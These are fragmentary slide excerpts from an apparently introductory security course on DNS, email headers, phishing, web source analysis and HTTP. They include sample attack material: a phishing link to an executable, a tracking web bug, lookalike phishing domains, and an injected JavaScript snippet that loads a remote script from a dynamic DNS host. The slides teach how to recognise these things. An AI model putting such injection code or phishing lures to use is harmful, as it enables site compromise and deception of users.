requires its Internet Protocol address ◦ IPv4 - 66.228.49.238 ◦ IPv6 - 2600:3c00::f03c:91ff:fedf:78db • IANA gives blocks of IPs to Regional Internet Registries ◦ North America, South America, Asia-Pacific, Latin America, Africa ◦ RIRs give addresses to ISPs and hosting providers • Early adopters have legacy allocations ◦ US Gov't / Military ◦ Universities
are reserved or in legacy space Network Address Translation (NAT) Share one public IP with many machines Requires hardware and logic in software CIDR notation 10.0.0.0/8 = all IP addresses beginning with 10
4 address MX = Email server for domain NS = Name server Helpful to Have AAAA = IP version 6 address PTR = Pointer to domain for an IP address SPF = Sender Policy for anti-spam SRV = Pointer to any service TXT = Arbitrary Text
mapping hardcoded?) 2. Check local cache (have we seen this mapping in the past few minutes?) 3. Ask preferred DNS server (does Verizon know this mapping?) 4. DNS Server goes up the food chain a. Asks root DNS server where to find '.com' NS b. Asks .com NS where to find 'banana.com' NS c. Asks banana.com NS where to find 'www' d. www.banana.com responds "authoritatively" e. DNS Server responds with 69.164.205.196
*nix $ dig @ns1.google.com mail.google.com ;; ANSWER SECTION: mail.google.com. 604800 IN CNAME googlemail.l.google.com. googlemail.l.google.com. 300 IN A 74.125.228.86 googlemail.l.google.com. 300 IN A 74.125.228.85
nameservers Requires guessing the Query ID Typo-squatting (whitehouse.com) Registering similar domains Transferring DNS records Social engineering the registrar
fake or protected Stored with RIR or domain registrar On *nix $ whois 64.4.11.37 (from ARIN) NetRange: 64.4.0.0 - 64.4.63.255 NetName: HOTMAIL Address: One Microsoft Way City: Redmond
Body: Text, Attachments Mail Submission Agent (MSA) Listens on ports 587 and/or 25 Accepts mail on behalf of users Mail Transfer Agent (MTA) Looks up MX record of recipient
the latest transaction Only trust your mailserver Example: sending from office to home email Received: by 10.4.18.32(internal.google.com) Received: from mail.yourcompany.biz by mail.google.com with ESMTP id <stuff> Sun, 10 May 2013 12:84:29 -0400 (EDT)
Issue: Malicious Links Display text differs from actual destination <a href="http://evil.ru/a.exe">Payment Notification </a> Issue: Web Bugs Load invisible images to track receipt time and IP <img src="http://ad.shady.net/track.gif"
real sender Forged headers Mis-matched sender name and IP address Received:from legit.gov (spammer.com [81.95.144.7] 'X-Spam-Filtered' lines added by spammer Phishing Email from a compromised or spoofed sender with enticing theme and malicious contents
bankofamericaportal.com ◦ hxxp://webmail.hbo.com.s-thrones.co[.]ru • Dynamic DNS ◦ Hostnames are independent of each other since arbitrary people can request an entry ◦ Some providers allow client side software that will change the DNS entry based on the IP address of the client ◦ palderson.findme.com ◦ dol.ns01.us ◦ microsoft.ns01.us
h.src='http://dol.ns01.us:8081/web/xss.php'; ◦ document.getElementsByTagName('head')[0].appen dChild(h); • Dynamically adds new javascript to the page • No new files on infected web server • Small modification to existing javascript
visiting site: ◦ Ctrl + U ◦ or via menu • Directly view source without displaying page ◦ view-source:http://www.isightpartners.com/ • Source can reveal page creation software ◦ Meta-tags ◦ Comments ◦ Names within the elements (forms, javascript functions, etc) ◦ Directory names
copy for legal reasons ◦ Determine maliciousness ◦ Find vulnerabilities ◦ Read the page later • Firefox - Save web Page, complete ◦ Rearranges parts of the web page • Internet Explorer - Save Webpage, complete ◦ Adds comments • wget • wget -p
are read from disk and delivered unchanged to the client • Dynamic server ◦ Program or script is run that creates the content on-demand ◦ Database queries ◦ Remote retrieval ◦ Deliver content based on meta data of the client ▪ IP ▪ Referral Fields ▪ User-Agent
responsive ◦ Less bandwidth ◦ Lightens server load ◦ Not a substitute for server-side validation • Server-side validation ◦ Generally more secure ◦ Doesn't expose data or logic to the client
great! Extensible for any content Widely supported and mature protocol Persistent connections in HTTP 1.1 Also it has issues! Must accept a wide range of inputs Lack of session management
twitter.com! Please give me the resource at /NorthernlionLP. Also he's the best Server: Cool, here's that page, and I ignored that 'best' GET variable IDK what it means http://twitter.com/NorthernlionLP?best=yes
and resource name Host: Destination domain Referer: Originating page for request User-Agent: Client version and compatibility Accept-Language: English, you speak it? GET /highscores.html HTTP 1.1 Host: competitive-eating.biz Referer: google.com/search/q?sandwiches User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) Chrome/26.0.1410.64 Safari/537.31 Accept-Language: en-us
URI POST: Send data directly to site with same URI PUT: Create a resource [usually ignored] CONNECT: Get page on my behalf Optional Client Headers X-Forwarded-For: 73.5.1.2 (proxy logs) DNT: 1 (please don't track me)
Full URI for page Server: Server version and installed modules Content-Type: MIME Format of the response Last-Modified: Whether page should be refreshed from cache HTTP/1.1 200 OK Location: http://competitive-eating.biz/highscores.html Server: Nginx/1.41 Content-Type: text/html Last-Modified: Fri, 10 May 2013 02:01:13 GMT <HTML> <title>ALL TIME CHAMPIONS</title> </HTML> The Server's Response
Set using Set-Cookie or scripts user=couch,scotch=macallan; expires=Sat,16-May-2013; path=/; domain=.amazon.com i.e. this cookie denotes that I'm Couch and my purchase info. It can only be read by Amazon.